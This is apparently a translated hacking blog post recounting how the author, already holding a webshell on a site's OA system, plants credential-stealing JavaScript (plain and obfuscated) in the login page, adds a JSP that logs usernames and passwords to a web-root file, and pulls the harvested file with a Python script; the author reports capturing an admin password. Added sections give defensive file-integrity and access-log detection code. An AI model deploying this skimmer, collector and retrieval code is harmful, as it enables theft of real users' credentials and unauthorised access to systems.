Writing a phishing page to capture accounts for the website's OA system
I had found a stored XSS earlier, but the session cookie turned out to be HttpOnly. Well, my skills aren't good enough to get hold of it.
So I came up with this bit of mischief instead...
0x1 Picking the spot
If you're going to phish, you have to set a trap somewhere, right? So I went looking for the most convenient and direct spot: the login page...
Looking at the source, this spot can capture the plaintext credentials. The JS here checks whether the submitted account and password meet the format requirements, and the phishing JS can be inserted just above return true;
0x2 Building the trap
Now that a proper location is found, what are you waiting for? Write the code!
I found that this OA system uses jQuery, haha, which makes the POST much more convenient. What's that saying? Borrowing a knife to kill...
// JavaScript code, embedded in the login page
$.post("webmag/footer2.jsp",
{
    user: $("#loginName").val(),
    pass: $("#password").val()
});

// Obfuscated ("encrypted") version of the same snippet
eval(function(p,a,c,k,e,r){e=String;if(!''.replace(/^/,String)){while(c--)r[c]=k[c]||c;k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('$.1("2.3",{4:$("#5").0(),6:$("#7").0()});',8,8,'val|post|footer2|jsp|user|loginName|pass|password'.split('|'),0,{}))
Then the JSP code:
// footer2.jsp, used to save the account and password
<%@ page contentType="text/html; charset=UTF-8" %>
<%@ page language="java" %>
<%@ page import="java.io.*" %>
<%
String p_user = request.getParameter("user");
String p_pass = request.getParameter("pass");
if (p_user != "null") {
    String path = request.getRealPath("/") + "\\webmag\\tutor\\tutor.txt";
    File file = new File(path);
    FileWriter fw = new FileWriter(file, true);
    BufferedWriter bw = new BufferedWriter(fw);
    bw.write(p_user + "|" + p_pass + "\n");
    bw.close();
    fw.close();
}
%>
0x3 Upload and test
I already had a shell, so I used the "kitchen knife" (the Caidao webshell client) to upload the new login page and footer2.jsp. (I couldn't think of a better name to disguise the jsp file...)
Before long a fish took the bait, and by chance I got the admin password...
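The defender's counterpart to this step is file-integrity monitoring of the web root: an edited login page and a newly dropped JSP both show up as differences against a known-good manifest. The script below is an added example, not code from the original post. It assumes a web root directory and a JSON-serialisable manifest of SHA-256 hashes; the sample web root, the edit to the login page and the dropped file are all constructed inside a temporary directory for the demo.

```python
"""Added example (not from the original post): web-root integrity check.

Assumptions: the web root is a plain directory tree; the baseline manifest
is a dict {relative path: sha256} captured when the site was known-good.
The sample web root and the simulated tampering below are constructed.
"""
import hashlib
import os
import tempfile


def hash_file(path):
    """SHA-256 of a file, read in chunks so large assets are fine."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(webroot):
    """Map every file under webroot (relative, '/'-separated) to its hash."""
    manifest = {}
    for dirpath, _, filenames in os.walk(webroot):
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, webroot).replace(os.sep, "/")
            manifest[rel] = hash_file(full)
    return manifest


def compare_manifests(baseline, current):
    """Sorted lists of paths that appeared, vanished or changed content."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in baseline
                      if p in current and baseline[p] != current[p])
    return {"added": added, "removed": removed, "modified": modified}


def demo():
    """Build a constructed web root, baseline it, tamper, and report."""
    with tempfile.TemporaryDirectory() as webroot:
        os.makedirs(os.path.join(webroot, "webmag"))
        login = os.path.join(webroot, "webmag", "login.jsp")
        with open(login, "w") as f:
            f.write("<script>function check(){ return true; }</script>\n")
        baseline = build_manifest(webroot)          # known-good snapshot

        # Simulated tampering: login page edited, unknown JSP dropped.
        with open(login, "a") as f:
            f.write("<script>/* constructed: extra inline script */</script>\n")
        with open(os.path.join(webroot, "webmag", "footer2.jsp"), "w") as f:
            f.write("<% /* constructed placeholder */ %>\n")

        return compare_manifests(baseline, build_manifest(webroot))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print("%-9s %s" % (kind, ", ".join(paths) or "-"))
```

In practice the baseline is written at deploy time and the comparison runs from cron or a FIM agent; any "added" JSP under the web root, or a "modified" login page outside a release window, is worth an immediate look.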
0x4 Back up, back up, back up! (Important things are said three times!)
Anything on the server will be deleted by O&M sooner or later, so I turned to Python to save the collected accounts and passwords!
# Python code, used to collect the recent accounts and passwords from the remote server
# -*- coding: UTF-8 -*-
# Python 2
import urllib2
print 'getting mails now'
data = urllib2.urlopen('http://www.xxxxxx.com/xxxxx/webmag/tutor/tutor.txt')
result = data.read()
with open('mail.txt', 'w') as f:
    f.write(result)
print 'OK, enjoy it :)'
In testing, it ran successfully on both a phone and a Raspberry Pi ~
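Both halves of this setup leave traces in the web server's access log: POSTs to an endpoint the application never exposed (the dropped footer2.jsp) and repeated GETs of a plaintext data file served straight out of the web root. The detection below is an added example written from the defender's side, not code from the original post. It assumes combined/common log format and an allowlist of the application's legitimate POST endpoints; the allowlist and the log lines are constructed for the demo.

```python
"""Added example (not from the original post): access-log detection for a
dropped collector endpoint and a harvested-data file in the web root.

Assumptions (all constructed for this demo): combined/common log format,
an allowlist of the OA application's real POST endpoints, and the sample
log lines below.
"""
import re

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed: endpoints the application is known to accept POSTs on.
KNOWN_POST_ENDPOINTS = {"/webmag/login.do", "/webmag/mail/send.do"}

# Plaintext data files have no business being served from the web root.
DATA_FILE_EXT = (".txt", ".log", ".csv")

# Constructed sample log: one normal login, one POST to an endpoint that
# does not exist in the application, and a remote fetch of a .txt file.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2015:10:00:01 +0800] "GET /webmag/login.jsp HTTP/1.1" 200 4120
10.0.0.5 - - [01/Jan/2015:10:00:07 +0800] "POST /webmag/footer2.jsp HTTP/1.1" 200 0
10.0.0.5 - - [01/Jan/2015:10:00:07 +0800] "POST /webmag/login.do HTTP/1.1" 302 0
10.0.0.8 - - [01/Jan/2015:10:02:11 +0800] "POST /webmag/mail/send.do HTTP/1.1" 200 512
203.0.113.9 - - [01/Jan/2015:23:15:00 +0800] "GET /webmag/tutor/tutor.txt HTTP/1.1" 200 884
203.0.113.9 - - [01/Jan/2015:23:15:02 +0800] "GET /webmag/static/app.js HTTP/1.1" 200 9120
"""


def parse_line(line):
    """Return the named fields of one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def analyze(log_text, known_posts=KNOWN_POST_ENDPOINTS):
    """Return (rule, path, client ip) findings, in log order."""
    findings = []
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]          # drop the query string
        if rec["method"] == "POST" and path not in known_posts:
            findings.append(("post-to-unknown-endpoint", path, rec["ip"]))
        if rec["status"] == "200" and path.lower().endswith(DATA_FILE_EXT):
            findings.append(("data-file-served-from-webroot", path, rec["ip"]))
    return findings


if __name__ == "__main__":
    for rule, path, ip in analyze(SAMPLE_LOG):
        print("%-30s %s from %s" % (rule, path, ip))
```

The POST allowlist is the important part: a login form that submits to two different places in the same second is not something the real application does, so the first rule fires on the very first victim, well before a file in the web root grows large enough to notice.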
0x5 Summary
The coding wasn't smooth because I don't know JSP. I spent a long time on Baidu piecing the code together, then wrote footer2.jsp based on my PHP experience.
I hope O&M doesn't notice that I tampered with the homepage... Even though the JS is obfuscated, it's not very reassuring :(
Anyway, this phishing was a success!